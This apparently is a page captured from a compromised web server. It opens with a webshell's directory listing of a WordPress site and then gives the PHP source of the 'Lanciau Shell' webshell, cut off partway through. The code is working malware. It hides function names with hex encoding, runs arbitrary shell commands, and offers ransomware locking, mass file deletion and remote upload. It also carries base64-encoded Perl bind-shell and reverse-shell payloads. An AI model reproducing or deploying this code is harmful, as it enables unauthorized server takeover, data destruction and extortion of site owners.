Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
wdbbsgxf /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
css
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
js
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
shop
[ DIR ]
drwxr-xr-x
2026-03-14 21:47
wp-admin
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
wp-content
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
wp-includes
[ DIR ]
dr-xr-xr-x
2026-02-07 11:45
.htaccess
0
B
-r--r--r--
2026-03-19 20:59
css.zip
242.01
MB
-rw-r--r--
2024-10-02 10:49
error_log
20
KB
-rw-r--r--
2026-03-20 00:26
index.php
0
B
-r--r--r--
2026-03-19 20:59
mah.php
0
B
-rw-r--r--
2024-07-17 07:15
php.ini
635
B
-rw-r--r--
2023-05-14 16:50
s.php
0
B
-rw-r--r--
2026-03-15 02:34
wp-activate.php
7.21
KB
-rw-r--r--
2024-04-03 04:31
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-08-09 10:55
wp-conffq.php
308.59
KB
-rw-r--r--
2026-02-07 05:47
wp-config-sample.php
2.96
KB
-rw-r--r--
2024-07-17 07:15
wp-config.php
3.5
KB
-rw-r--r--
2024-03-14 12:19
wp-cron.php
8.25
KB
-rw-r--r--
2026-02-07 07:29
wp-headre.php
16.3
KB
-rw-r--r--
2025-12-13 11:40
wp-links-opml.php
2.44
KB
-rw-r--r--
2022-11-27 00:31
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 07:15
wp-login.php
50.04
KB
-rw-r--r--
2024-07-17 07:15
wp-logln.php
71.3
KB
-rw-r--r--
2026-03-14 21:30
wp-mail.php
8.33
KB
-rw-r--r--
2023-11-08 04:47
wp-settings.php
28.1
KB
-rw-r--r--
2024-07-17 07:15
wp-signup.php
33.58
KB
-rw-r--r--
2023-08-09 10:54
wp-trackback.php
4.77
KB
-rw-r--r--
2023-08-09 10:54
xmlrpc.php
3.17
KB
-rw-r--r--
2024-04-03 04:31
Save
Rename
<?php header("X-XSS-Protection: 0"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); $Array = [ // $GLOBALS['fungsi'][0] '66696c655f6765745f636f6e74656e7473', // f i l e g e t c o n t e n t s => 0 '69735f646972', // i s _ d i r => 1 '66696c655f7075745f636f6e74656e7473', // f i l e p u t c o n t e n t s => 2 '69735f66696c65', // i s _ f i l e => 3 '756e6c696e6b', // u n l i n k => 4 '66756E6374696F6E5F657869737473', // f u n c t i o n _ e x i s t s => 5 '6261736536345F656E636F6465', // b a s e 6 4 _ d e c o d e => 6 '676574637764' // g e t c w d => 7 ]; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } error_reporting(0); @clearstatcache(); @mb_internal_encoding('UTF-8'); set_time_limit(0); @ini_set('error_log',null); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); @ini_set('disable_functions', 0); session_start(); date_default_timezone_set("Asia/Jakarta"); $_7 = array_merge($_POST, $_GET); $_r = "required='required'"; $gcw = "getcwd"; $correctPassword = "lanciau1337"; if (isset($_POST['pass'])) { $enteredPassword = $_POST['pass']; if ($enteredPassword === $correctPassword) { $_SESSION['forbidden'] = true; } else { echo '<script> document.querySelector("html").innerHTML = "<img style=\'display:block;position:absolute;top: 0;right: 0;bottom: 0;left: 0;z-index: 10;overflow-y: scroll; width: 100%; height: 100%;\' src=\'https://d.top4top.io/p_2967zkqjv1.jpeg\'>"; var source = "https://j.top4top.io/m_2967gtgnw1.mp3" var audio = document.createElement("audio"); audio.autoplay = true; audio.load() audio.play(); audio.src = source; </script>'; } } if (isset($_GET['logout'])) { session_unset(); session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit(); } if (!isset($_SESSION['forbidden'])) { ?> <!DOCTYPE html> <html> <head> <title>-=[ Lanciau Exploit ]=-</title> <link rel='icon' href='https://raw.githubusercontent.com/Mr-7Mind/BahanShell/main/hehe.png'> <meta name="theme color" content="#00BFFF"> <script src='https://cdn.statically.io/gh/analisyuki/animasi/9ab4049c/bintang.js' type='text/javascript'></script> </head> <style> body { background-image: url("https://i.ibb.co.com/jHL8F9j/photo1719945206.jpg"); background-repeat: no-repeat; background-size: cover; background-position: center; height: 100vh; margin: 0; display: flex; flex-direction: column; justify-content: center; align-items: center; background-color: black; } .bs-body-bg { color: transparent; } h1 { color: #00BFFF; } img { opacity: 0.5; width: 200px; height: 300px; } form { text-align: center; margin-top: 20px; } input[type="password"] { padding: 5px; } input[type="submit"] { background-color: #00BFFF; color: white; border: none; padding: 5px 10px; cursor: pointer; } </style> <body> <form method="post"> <input placeholder="password" type="password" name="pass" required> <input type="submit" name="watching" value="GO IN!"> </form> </body> </html> <?php exit; } ?> <?php if(isset($_7["left"])) { session_start(); session_destroy(); echo '<script>window.location="'.$_SERVER['PHP_SELF'].'";</script>'; } if(isset($_7['opn']) && ($_7['opn'] != '') && ($_7['action'] == 'download')){ @ob_clean(); $file = $_7['opn']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } function w($dir,$perm) { if(!is_writable($dir)) { return "<rd>".$perm."</rd>"; } else { return "<gr>".$perm."</gr>"; } } function s(){ echo '<style>table{display:none;}</style><div class="table-responsive"><hr></div>'; } function ok(){ echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>'; } function er(){ echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>'; } function sz($byt){ $typ = array('B', 'KB', 'MB', 'GB', 'TB'); for($i = 0; $byt >= 1024 && $i < (count($typ) -1 ); $byt /= 1024, $i++ ); return(round($byt,2)." ".$typ[$i]); } function ia() { $ia = ''; if (getenv('HTTP_CLIENT_IP')) $ia = getenv('HTTP_CLIENT_IP'); else if(getenv('HTTP_X_FORWARDED_FOR')) $ia = getenv('HTTP_X_FORWARDED_FOR'); else if(getenv('HTTP_X_FORWARDED')) $ia = getenv('HTTP_X_FORWARDED'); else if(getenv('HTTP_FORWARDED_FOR')) $ia = getenv('HTTP_FORWARDED_FOR'); else if(getenv('HTTP_FORWARDED')) $ia = getenv('HTTP_FORWARDED'); else if(getenv('REMOTE_ADDR')) $ia = getenv('REMOTE_ADDR'); else $ia = 'Unknown IP.'; return $ia; } function exe($cmd) { if ($GLOBALS['fungsi'][5]('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif ($GLOBALS['fungsi'][5]('exec')) { @exec($cmd, $results); $buff = ""; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif ($GLOBALS['fungsi'][5]('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('proc_open')) { $pipes = array(); $process = @proc_open($cmd . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $buff = @stream_get_contents($pipes[1]); @proc_close($process); return $buff; } elseif ($GLOBALS['fungsi'][5]('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function exe_root($set,$sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/".$xx."/i", $set)) { $set = $set." ".$xx; } $a = $GLOBALS['fungsi'][5]; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink,$sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } function p($file){ $p = fileperms($file); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p &0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } if(isset($_7['dir'])) { $dir = unhex($_7['dir']); chdir($dir); } else { $dir = hex($gcw()); } echo " <html> <head> <title>Lanciau Exploit</title> <meta charset='UTF-8'> <meta name='author' content='Lanciau Exploit'> <meta name='viewport' content='width=device-width, initial-scale=0.70'> <link rel='icon' href='https://chat.openai.com/apple-touch-icon.png'> <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css'> <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css'> <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css'> <script src='https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script> <script src='https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script> <script src='https://code.jquery.com/jquery-3.3.1.slim.min.js'></script> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap'); *{ font-family: 'Poppins', sans-serif; font-weight: 400; } body { background: url('https://i.ibb.co.com/jHL8F9j/photo1719945206.jpg'); background-repeat: no-repeat; background-size: cover; background-position: center; color: #ff0000; } h4 { color: #ff0000; } .box-container { border: 1px solid #ff0000; } rd { color: red; } corner { position: relative; } .btn-outline-light { --bs-btn-color: #ffffff; --bs-btn-border-color: #ff0000; --bs-btn-hover-color: #000; --bs-btn-hover-bg: #ff0000; --bs-btn-hover-border-color: #ff0000; --bs-btn-focus-shadow-rgb: 248,249,250; --bs-btn-active-color: #000; --bs-btn-active-bg: #ff0000; --bs-btn-active-border-color: #ff0000; --bs-btn-active-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); --bs-btn-disabled-color: #ff0000; --bs-btn-disabled-bg: transparent; --bs-btn-disabled-border-color: #ff0000; } .table-dark { --bs-table-color: #ff0000; --bs-table-color: #ff0000; --bs-table-bg: transparent; --bs-table-border-color: #ff0000; --bs-table-striped-bg: #ff0000; --bs-table-striped-color: #ff0000; --bs-table-active-bg: #ff0000; --bs-table-active-color: #ff0000; --bs-table-hover-bg: #00000000; --bs-table-hover-color: #ff0000; } .listdir:hover { color: #000; } tr:hover { color: #000; } .card { --bs-card-bg: #0c0e14; border: 1px solid #ff0000; } u { color: #ff0000; } .form-control { background-color: #0c0e14; color: #ff0000; border: 1px solid #ff0000; } textarea:focus, input[type=\"text\"]:focus, input[type=\"password\"]:focus, input[type=\"textarea\"]:focus input[type=\"datetime\"]:focus, input[type=\"datetime-local\"]:focus, input[type=\"date\"]:focus, input[type=\"month\"]:focus, input[type=\"time\"]:focus, input[type=\"week\"]:focus, input[type=\"number\"]:focus, input[type=\"email\"]:focus, input[type=\"url\"]:focus, input[type=\"search\"]:focus, input[type=\"tel\"]:focus, input[type=\"color\"]:focus, .uneditable-input:focus { border-color: 1px solid #ff0000; background-color: #000; box-shadow: none; color: #ff0000; outline: 0 none; } :root { --bs-body-bg: #000; --bs-body-color: #ccc; --bs-secondary-color: #ccc; } form > * { color: #ff0000; } .btn-group-vertical>.btn, .btn-group>.btn { margin-top: 10px; } .btn-primary { --bs-btn-color: #ffffff; --bs-btn-bg: #ff0000; --bs-btn-border-color: #ff0000; --bs-btn-hover-color: #fff; --bs-btn-hover-bg: #05bb05; --bs-btn-hover-border-color: #ff0000; --bs-btn-focus-shadow-rgb: 49,132,253; --bs-btn-active-color: #fff; --bs-btn-active-bg: #ff0000; --bs-btn-active-border-color: #0a53be; --bs-btn-active-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); --bs-btn-disabled-color: #fff; --bs-btn-disabled-bg: #ff0000; --bs-btn-disabled-border-color: #ff0000; } .btn-dark { --bs-btn-color: #ffffff; --bs-btn-bg: #ff0000; --bs-btn-border-color: #ff0000; --bs-btn-hover-color: #fff; --bs-btn-hover-bg: #05bb05; --bs-btn-hover-border-color: #ff0000; --bs-btn-focus-shadow-rgb: 49,132,253; --bs-btn-active-color: #fff; --bs-btn-active-bg: #ff0000; --bs-btn-active-border-color: #0a53be; --bs-btn-active-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); --bs-btn-disabled-color: #fff; --bs-btn-disabled-bg: #ff0000; --bs-btn-disabled-border-color: #ff0000; } .bg-infos { background-color: #0c0e14; color: #ccc; border: 1px solid #ff0000; } .input-ransom { background-color: transparent; border: 1px solid red; padding: 5px; } .btn-ransom { margin-top: 15px; border-radius: 25px; background-color: transparent; border: 1px solid red; padding: 5px; } </style> <body class='text-light'> <div class='container-fluid'> <div class='py-3' id='main'> <div class='box shadow box-container p-4 rounded-3'> <a class='text-decoration-none text-light anu' href='".$_SERVER['PHP_SELF']."'><h4 class='text-center'>Lanciau Shell</h4></a>"; if(isset($_7['path'])){ $path = unhex($_7['path']); chdir($path); }else{ $path = $gcw(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=".hex('/')."'>/</a>"; continue; } if($pat == '') continue; echo "<a class='text-decoration-none' href='?path="; for($i=0;$i<=$id;$i++){ echo hex($paths[$i]); if($i != $id) echo hex("/"); } echo "'>".$pat."</a>/"; } $scand = scandir($path); echo " [ ".w($path, p($path))." ]"; $sql = ($GLOBALS['fungsi'][5]('mysql_connect')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $curl = ($GLOBALS['fungsi'][5]('curl_version')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $wget = (exe('wget --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $pl = (exe('perl --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $py = (exe('python --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $pxex = (exe('pkexec --version')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $gcc = (exe('gcc --version')) ? "<gr>ON</gr>" : "<rd>OFF</rd>"; $disfunc = @ini_get("disable_functions"); $kernel = php_uname(); $phpver = PHP_VERSION; $phpos = PHP_OS; $domen = $_SERVER["SERVER_NAME"]; $soft = $_SERVER["SERVER_SOFTWARE"]; $ip = gethostbyname($_SERVER['HTTP_HOST']); $yip = $_SERVER['REMOTE_ADDR']; if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>$disfunc</rd>"; } if(!$GLOBALS['fungsi'][5]('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<rd>ON</rd>" : "<gr>OFF</gr>"; echo " <div class='container-fluid'> <div class='corner anu py-3'> <button class='btn btn-outline-light btn-sm' data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'> <i class='bi bi-info-circle'></i> info <i class='bi bi-chevron-down'></i> </button> </div> <div class='collapse text-dark mb-3' id='collapseExample'> <div class='box shadow bg-infos p-3 rounded-3'> System: <gr>$kernel</gr><br> User: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br> PHP Version: <gr>$phpver</gr>PHP os: <gr>$phpos</gr><br> Software: <gr>$soft</gr><br> Domain: <gr>$domen</gr><br> Server Ip: <gr>$ip</gr><br> Your Ip: <gr>$yip</gr><br> Safe Mode: $sm<br> MySQL: $sql | Perl: $pl | WGET: $wget | CURL: $curl | Python: $py | Pkexec: $pxex | GCC: $gcc<br> Disable Function:<br><pre>$disfc</pre> </div> </div> </div> <div class='text-center'> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='".basename(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH))."'><i class='bi bi-house'></i> HOME</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=ransomware'><i class='bi bi-lock'></i> Ransomware Lock</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=installgs'><i class='bi bi-upload'></i> Install GS</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=uploadvialink'><i class='bi bi-upload'></i> Upload Via Link</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=cmd'><i class='bi bi-terminal'></i> Console</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=root_file'><i class='bi bi-file-earmark'></i> Green All File</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=dark_file'><i class='bi bi-file-earmark-lock'></i> Lock All File</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=lockshell'><i class='bi bi-file-earmark-lock'></i> Lock Shell</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=scan_root'><i class='bi bi-search'></i> Scan root</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=createdir'><i class='bi bi-files'></i> Create Dir</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=createfile'><i class='bi bi-file'></i> Create File</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=upload'><i class='bi bi-upload'></i> Upload</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=delete'><i class='bi bi-trash'></i> Mass delete</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=network'><i class='bi bi-hdd-network'></i> Network</a> </div><br><br> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=rootshell'><i class='bi bi-file-earmark'></i> 0777 Shell</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=root_folders'><i class='bi bi-folder'></i> Green All Folders</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?dir=".hex($fungsi[7]())."&id=dark_folders'><i class='bi bi-folder'></i> Lock All Folders</a> </div> <div class='btn-group'> <a class='btn btn-outline-light btn-sm' href='?logout=true'><i class='bi bi-box-arrow-in-left'></i> Logout</a> </div> </div>"; if(isset($_7['dir'])) { $dir = unhex($_7['dir']); chdir($dir); } else { $dir = hex($gcw()); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); for($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if($i != $c_dir) { }} function changeFilePermissions($filename, $permissions) { if (file_exists($filename)) { if (chmod($filename, $permissions)) { echo "Izin file $filename berhasil diubah menjadi $permissions."; } else { echo "Gagal mengubah izin file $filename."; } } else { echo "File $filename tidak ditemukan."; } } function changeFolderPermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { chmod($item->getPathname(), $perms); } } } function changeFilePermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isFile()) { chmod($item->getPathname(), $perms); } } } $currentDirectory = '.'; if (isset($_GET['id']) && $_GET['id'] === 'root_file') { $newFilePermissions = 0644; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'root_folders') { $newFolderPermissions = 0755; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'dark_file') { $newFilePermissions = 0444; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'dark_folders') { $newFolderPermissions = 0555; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } $filename = __FILE__; if (isset($_GET['id']) && $_GET['id'] === 'lockshell') { $newPermissions = 0444; changeFilePermissions($filename, $newPermissions); } if (isset($_GET['id']) && $_GET['id'] === 'rootshell') { $newPermissions = 0777; changeFilePermissions($filename, $newPermissions); } $ip = $_SERVER['REMOTE_ADDR']; $rib = "http://ip-api.com/json/{$ip}?fields=city"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $rib); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); $city = isset($data['city']) ? $data['city'] : 'Tidak Diketahui'; if($_7['id'] == 'createdir'){ if($_POST['start']) { $dirname = $_POST["dirname"]; $dirs = unhex($_GET['dir']); $n_dfa65a16 = mkdir($dirs . "/" . $dirname); if ($n_dfa65a16 == true) { echo "[<gr><i class='bi bi-check-all'></i></gr>] $dirname Create successfully<br>"; } else { echo "[<red><i class='bi bi-exclamation-triangle-fill'></i></red>] Failed to Create $dirname<br>"; } } s(); echo " <div class='card card-body text-dark input-group mb-3'> <form method='POST'> <i class='bi bi-file-earmark'></i> Directory Name: <input class='form-control btn-sm' type='text' name='dirname' placeholder='directory name'> <div class='d-grid gap-2'> <input class='btn btn-dark btn-sm'type='submit' name='start' value='createdir'> </div> </form> </div>"; } if($_7['id'] == 'createfile'){ if($_POST['start']) { $filenames = $_POST["d_file"]; $contentFile = $_POST["script"]; $dirs = unhex($_GET['dir']); $n_dfa65a16 = file_put_contents($dirs . "/" . $filenames, $contentFile); if (file_exists($dirs . "/" . $filenames)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] $filenames Create successfully<br>"; } else { echo "[<red><i class='bi bi-exclamation-triangle-fill'></i></red>] Failed to Create $filenames<br>"; } } s(); echo " <div class='card card-body text-dark input-group mb-3'> <form method='POST'> <i class='bi bi-file-earmark'></i> Filename: <input class='form-control btn-sm' type='text' name='d_file' placeholder='filename'> <i class='bi bi-file-earmark'></i> Your script: <textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script'></textarea> <div class='d-grid gap-2'> <input class='btn btn-dark btn-sm'type='submit' name='start' value='createfile'> </div> </form> </div>"; } if ($_7['id'] == 'delete') { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $fileToDelete = "$dir/$namefile"; if (is_file($fileToDelete) && is_writable($fileToDelete)) { if (unlink($fileToDelete)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] $fileToDelete deleted successfully<br>"; } else { echo "[<red><i class='bi bi-exclamation-triangle-fill'></i></red>] Failed to delete $fileToDelete<br>"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; if ($dirb === '.' || $dirb === '..') { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if ($_7['start']) { mass_delete($_7['d_dir'], $_7['d_file']); } s(); echo " <div class='card card-body text-dark input-group mb-3'> <form method='POST'> <i class='bi bi-folder'></i> Directory: <input class='form-control btn-sm' type='text' name='d_dir' value='$dir' $_r> <i class='bi bi-file-earmark'></i> Filename: <div class='input-group'> <input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' $_r><br> <div class='input-group-append'> <input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'> </div> </div> </form> </div>"; } if($_7['id'] == 'network'){ s(); echo " <div class='card text-dark'> <div class='card-header'> <form method='post'> <u>Bind port to /bin/sh [Perl]</u><br> <u>Port :</u> <div class='input-group'> <input class='form-control btn-sm' type='text' name='port' placeholder='6969'> <input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'> </div> <h5>Back-Connect</h5> <u>Server :</u> <input class='form-control btn-sm' type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> <u>Port :</u> <div class='input-group'> <input class='form-control btn-sm' type='text' name='port' placeholder='6969'> <select class='form-control btn-sm' name='bc'> <option value='perl'>perl</option> <option value='python'>python</option> </select> </div> <div class='d-grid gap-2'> <input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'> </div> </form>"; if($_7['bpl']){ $bp = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen('bp.pl','w'); fwrite($brt,$bp); $out = exe("perl bp.pl ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>"; $GLOBALS['fungsi'][4]("bp.pl"); } if($_7['bc'] == 'perl'){ $bc = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>"; $GLOBALS['fungsi'][4]("bc.pl"); } if($_7['bc'] == 'python'){ $bc_py = 